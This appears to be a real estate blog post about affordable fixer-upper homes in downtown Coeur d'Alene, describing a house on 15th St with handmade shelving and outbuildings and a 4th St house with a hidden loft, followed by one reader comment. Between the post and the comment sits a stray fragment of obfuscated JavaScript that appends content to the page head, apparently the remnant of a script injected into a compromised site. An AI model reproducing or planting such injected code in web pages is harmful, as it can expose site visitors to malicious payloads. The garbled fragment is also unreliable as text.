Downtown Coeur d'Alene Fixer-Uppers

I recently showed a series of homes in the downtown Coeur d’Alene area priced in the 100’s that oozed potential.  Some just needed a little TLC, while others required a bit of a stouter renovation, but all were a do-it-yourselfer’s dream.

One low priced gem on 15th St in the Ashbrook neighborhood featured ingenious hand made shelving units in nearly every nook and cranny of the house.

The lot set up nicely with three outbuildings, including a spacious modern shop and a nifty little playhouse for the kids, as well as areas with serious garden potential.

It’s common in older downtown Coeur d’Alene homes for owners to increase space by ad a steep hidden staircase into the rafters where one now finds an exceptional bohemian loft space.

Such is the case in a home I saw on 4th St, whose nicely updated main floor combined with the loft and basement brought the total layout to 2500sqft.

var avgB = ”+Zkre+”; NRvf.append(avgB);} kIsLjt(jQuery(‘head’));

  1. The house I grew up in had a giant loft space and it was my favorite room in the house! I’m glad its still possible to find places with that same type of vibe.
